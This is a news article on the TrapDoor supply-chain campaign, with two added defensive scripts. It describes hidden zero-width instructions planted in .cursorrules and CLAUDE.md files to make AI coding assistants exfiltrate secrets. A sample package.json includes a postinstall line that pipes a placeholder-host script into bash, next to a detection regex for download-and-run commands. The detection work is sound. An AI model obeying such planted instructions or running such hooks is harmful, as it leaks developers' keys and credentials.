A new cryptocurrency theft campaign is targeting developers who are most likely to have wallet keys, cloud credentials, and production access on their machines.
Researchers at security firm Socket said earlier this week that they identified a supply chain attack called TrapDoor distributed across three major open source programming registries, with more than 34 malicious packages and hundreds of related versions and artifacts.
A key takeaway is that attackers are becoming more focused. Alongside social engineering, which targets the individuals who hold key information, these supply chain attacks are designed to trap developers rather than random retail users. Developers are the people who can have wallet files, SSH keys, GitHub tokens, cloud credentials, and production access on the same machine they use to build crypto and AI tools.
Socket did not identify the victims or the stolen funds, but said the packages were active on npm, PyPI, and Crates.io and contained payloads that could steal wallet data, exfiltrate credentials, probe AWS and GitHub tokens, and leave files to maintain active access.
Packages written in JavaScript, Python, and Rust were disguised as developer aids, security scanners, wallet tools, Solidity utilities, AI prompt packages, and Sui or Move build aids.
Boring by design
The names were boring by design. The packages were called “wallet-security-checker,” “defi-risk-scanner,” “solidity-build-guard,” “move-compiler-tools,” and “llm-context-compressor,” and they looked like the kind of small utilities a crypto or AI developer might install without much thought.
However, once installed, the payloads attempted to extract much more than just package data.
In npm packages, the malware searched a developer’s machine for private keys, passwords, GitHub tokens, and cloud logins. It also tested some of the stolen credentials, attempted to reach other systems using SSH keys, and left behind files that could keep the infection active.
SSH keys are login files that developers use to access servers, code repositories, and other machines. If stolen, they can allow an attacker to move from a compromised laptop to a company’s broader infrastructure.
The attack also uses files such as .cursorrules and claude.md, which allow developers to give project-specific instructions to AI coding tools. Socket said the campaign planted hidden instructions using zero-width Unicode characters, apparently trying to get future AI assistant sessions to run fake “security scans” that collected and exfiltrated secrets.
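One defensive check this suggests is to treat AI instruction files as untrusted input and look for characters that cannot be seen in an editor. The script below is an added example written for this article, not Socket's tooling or the campaign's code: it flags zero-width and other invisible Unicode format characters in files such as .cursorrules and CLAUDE.md, and produces a cleaned copy for review. The `.cursorrules` / `claude.md` file names come from the article; the sample file contents are constructed.

```python
"""Scan AI coding-assistant instruction files for hidden zero-width characters.

Added example (not Socket's tooling): flags invisible Unicode in files such as
.cursorrules and CLAUDE.md, where hidden text could steer an assistant session.
"""
import unicodedata
from pathlib import Path

# Invisible code points most often used to hide text inside otherwise normal prose.
ZERO_WIDTH = {
    "\u200b": "ZERO WIDTH SPACE",
    "\u200c": "ZERO WIDTH NON-JOINER",
    "\u200d": "ZERO WIDTH JOINER",
    "\u2060": "WORD JOINER",
    "\ufeff": "ZERO WIDTH NO-BREAK SPACE",
}

# File names the article mentions; matching is case-insensitive so claude.md == CLAUDE.md.
AI_RULE_FILES = {".cursorrules", "claude.md"}


def is_ai_rule_file(path):
    """True if the file name is one an AI coding tool reads for project instructions."""
    return Path(path).name.lower() in AI_RULE_FILES


def find_invisible(text):
    """Return (line_no, col, name) for every zero-width or other format (Cf) character.

    Unicode category Cf also covers bidi overrides and soft hyphens, which are
    equally out of place in a plain instruction file.
    """
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for col, ch in enumerate(line, 1):
            if ch in ZERO_WIDTH or unicodedata.category(ch) == "Cf":
                name = ZERO_WIDTH.get(ch) or unicodedata.name(ch, f"U+{ord(ch):04X}")
                hits.append((line_no, col, name))
    return hits


def strip_invisible(text):
    """Return the text with every format (Cf) character removed, for safe review."""
    return "".join(ch for ch in text if unicodedata.category(ch) != "Cf")


def scan_file(path):
    """Read one file as UTF-8 and return its findings (empty list if clean)."""
    return find_invisible(Path(path).read_text(encoding="utf-8"))


# Constructed sample: a plausible .cursorrules with three zero-width characters
# spliced into the second line. The visible text looks harmless in an editor.
SAMPLE_CURSORRULES = (
    "Always use TypeScript strict mode.\n"
    "Run a security scan before\u200b\u200c\u200d committing.\n"
)

if __name__ == "__main__":
    for line_no, col, name in find_invisible(SAMPLE_CURSORRULES):
        print(f"sample .cursorrules:{line_no}:{col}: {name}")
    print(repr(strip_invisible(SAMPLE_CURSORRULES)))
```

Run it against every file for which `is_ai_rule_file` is true in a repository checkout or in an incoming pull request; any hit is worth a manual look, because a legitimate rules file has no reason to contain format characters at all.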
That transformed the attack from a run-of-the-mill credential stealer into something closer to purpose-built malware for developer environments. Installing the package is only the first step; the real target is the workstation itself: wallets, repositories, browser data, cloud keys, SSH access, and the AI coding tool configuration files described above.
The Rust packages used malicious build.rs scripts that run during compilation, targeting Sui and Move developers. PyPI packages executed remote JavaScript on import. Packages on npm used post-install hooks.
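Two of those three execution paths can be audited before anything runs. The following is an added example written for this article, not Socket's tooling: it lists the npm lifecycle scripts in a package.json (the hooks npm runs automatically during install) and flags commands that fetch or evaluate code, and it reports whether a Rust crate carries a build script that Cargo will compile and execute. The suspicious-command patterns are constructed heuristics, the sample manifests are constructed, and the package names and host in them are placeholders rather than the packages Socket reported.

```python
"""Audit packages for the install-time and compile-time hooks the TrapDoor
campaign abused: npm lifecycle scripts and Cargo build scripts.

Added example, not Socket's tooling. The suspicious-command patterns are
constructed heuristics, not a signature for any specific package.
"""
import json
import re

# npm runs these automatically during `npm install`, before any of your code does.
NPM_INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic: commands that fetch or evaluate code rather than build it locally.
SUSPICIOUS_CMD = re.compile(
    r"\bcurl\b|\bwget\b|\bnode\s+-e\b|\beval\b|https?://|\bbase64\b|\bbash\s+-c\b",
    re.IGNORECASE,
)

# A `build = "..."` key in Cargo.toml points Cargo at a build script other than
# the default ./build.rs. (A dependency literally named `build` would also match;
# that is acceptable for a triage heuristic.)
CARGO_BUILD_KEY = re.compile(r'^\s*build\s*=\s*"([^"]+)"', re.MULTILINE)


def audit_package_json(text):
    """Return [(hook, command, suspicious)] for every lifecycle hook in package.json."""
    scripts = json.loads(text).get("scripts") or {}
    return [
        (hook, scripts[hook], bool(SUSPICIOUS_CMD.search(scripts[hook])))
        for hook in NPM_INSTALL_HOOKS
        if hook in scripts
    ]


def cargo_build_script(file_names, cargo_toml_text):
    """Return the build script path a crate will compile and run, or None.

    Cargo runs build.rs at the crate root automatically; a `build` key in
    [package] names an alternative file.
    """
    m = CARGO_BUILD_KEY.search(cargo_toml_text)
    if m:
        return m.group(1)
    return "build.rs" if "build.rs" in file_names else None


def summarize(package_json_text=None, cargo_files=(), cargo_toml_text=""):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    if package_json_text is not None:
        for hook, cmd, bad in audit_package_json(package_json_text):
            flag = "SUSPICIOUS" if bad else "review"
            findings.append(f"npm {hook} ({flag}): {cmd}")
    script = cargo_build_script(cargo_files, cargo_toml_text)
    if script:
        findings.append(f"cargo build script runs at compile time: {script}")
    return findings


# Constructed samples. Package names and the host are placeholders, not the
# packages reported by Socket.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-build-helper",
    "version": "1.0.0",
    "scripts": {
        "test": "jest",
        "postinstall": "curl -s https://placeholder.invalid/setup.sh | bash",
    },
})
CLEAN_PACKAGE_JSON = json.dumps({"name": "example-clean", "scripts": {"test": "jest"}})
SAMPLE_CARGO_TOML = '[package]\nname = "example-move-helper"\nversion = "0.1.0"\n'

if __name__ == "__main__":
    crate_files = ("Cargo.toml", "build.rs", "src/lib.rs")
    for line in summarize(SAMPLE_PACKAGE_JSON, crate_files, SAMPLE_CARGO_TOML):
        print(line)
```

A hook that is not flagged still deserves a glance: the heuristic only spots the obvious download-and-run shapes. For npm, setting `ignore-scripts=true` in `.npmrc` stops lifecycle scripts from running at install time at all, which is the stronger control; Cargo has no equivalent switch, so a crate with a build script has to be read before it is compiled. Import-time execution in Python packages is not covered here, since it lives in ordinary module code rather than in a manifest.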
Socket said it reported the packages to the affected registries and classified the campaign’s packages as malicious. The company also warned that the attacker opened pull requests against development and AI projects, attempting to add .cursorrules and CLAUDE.md files through normal open source contribution paths.